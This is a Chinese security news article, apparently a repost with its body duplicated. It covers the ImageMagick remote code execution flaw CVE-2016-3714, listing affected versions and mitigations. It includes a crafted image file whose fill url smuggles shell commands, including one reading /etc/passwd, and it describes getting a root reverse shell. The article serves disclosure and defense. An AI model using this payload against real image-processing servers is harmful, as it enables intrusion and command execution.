当前位置:安全企业动态 → 正文

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

责任编辑:editor004 |来源:企业网D1Net  2016-05-06 11:24:50 本文摘自:Sobug安全平台

1、前言

ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF、PNG、PDF以及PhotoCD等格式。众多的网站平台都是用他渲染处理图片。可惜在3号时被公开了一些列漏洞,其中一个漏洞可导致远程执行代码(RCE),如果你处理用户提交的图片。该漏洞是针对在野外使用此漏洞。许多图像处理插件依赖于ImageMagick库,包括但不限于PHP的imagick,Ruby的rmagick和paperclip,以及NodeJS的ImageMagick等。

产生原因是因为字符过滤不严谨所导致的执行代码.对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。

2、影响版本范围

ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)

ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)

低版本至6.9.3-9released 2016-04-30

3、攻击POC演示

先构建一个精心准备的图片:

vi exp1.jpg

pushgraphic-context

viewbox 0 0 640480

fill'url(https://"|id && ls -al /etc/passwd")'

popgraphic-context

执行攻击POC1,虽然有报错,但是两条命令都成功绕出执行了,

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  就说明漏洞是存在的

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  那么在制作一个远程下载反弹shell脚本,并且执行shell命令:

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  执行成功,上接受服务器看去:

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  Root权限的反弹shell就这样上来了.

4、修复方案

目前官方的最新修复补丁版本还未能出来,所以暂时建议做以下两种预防策略:

1. 在上传图片时需要通过文件内容来判断用户上传的是否为真实图片类型.

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  2.使用策略配置文件来禁用ImageMagick的有风险的编码器

对于ImageMagick全局策略配置文件在/etc/ImageMagick下对policy.xml最后一行进行增加下列配置:

vi/etc/ImageMagick/policy.xml

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  在去执行攻击POC2看看,无法执行下载动作和执行命令了。

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

关键字:ImageMagickNodeJS

本文摘自:Sobug安全平台

x ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案 扫一扫
分享本文到朋友圈
当前位置:安全企业动态 → 正文

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

责任编辑:editor004 |来源:企业网D1Net  2016-05-06 11:24:50 本文摘自:Sobug安全平台

1、前言

ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF、PNG、PDF以及PhotoCD等格式。众多的网站平台都是用他渲染处理图片。可惜在3号时被公开了一些列漏洞,其中一个漏洞可导致远程执行代码(RCE),如果你处理用户提交的图片。该漏洞是针对在野外使用此漏洞。许多图像处理插件依赖于ImageMagick库,包括但不限于PHP的imagick,Ruby的rmagick和paperclip,以及NodeJS的ImageMagick等。

产生原因是因为字符过滤不严谨所导致的执行代码.对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。

2、影响版本范围

ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)

ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)

低版本至6.9.3-9released 2016-04-30

3、攻击POC演示

先构建一个精心准备的图片:

vi exp1.jpg

pushgraphic-context

viewbox 0 0 640480

fill'url(https://"|id && ls -al /etc/passwd")'

popgraphic-context

执行攻击POC1,虽然有报错,但是两条命令都成功绕出执行了,

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  就说明漏洞是存在的

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  那么在制作一个远程下载反弹shell脚本,并且执行shell命令:

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  执行成功,上接受服务器看去:

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  Root权限的反弹shell就这样上来了.

4、修复方案

目前官方的最新修复补丁版本还未能出来,所以暂时建议做以下两种预防策略:

1. 在上传图片时需要通过文件内容来判断用户上传的是否为真实图片类型.

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  2.使用策略配置文件来禁用ImageMagick的有风险的编码器

对于ImageMagick全局策略配置文件在/etc/ImageMagick下对policy.xml最后一行进行增加下列配置:

vi/etc/ImageMagick/policy.xml

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

  在去执行攻击POC2看看,无法执行下载动作和执行命令了。

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修复方案

关键字:ImageMagickNodeJS

本文摘自:Sobug安全平台

电子周刊
回到顶部

关于我们联系我们版权声明隐私条款广告服务友情链接投稿中心招贤纳士

企业网版权所有 ©2010-2024 京ICP备09108050号-6 京公网安备 11010502049343号

^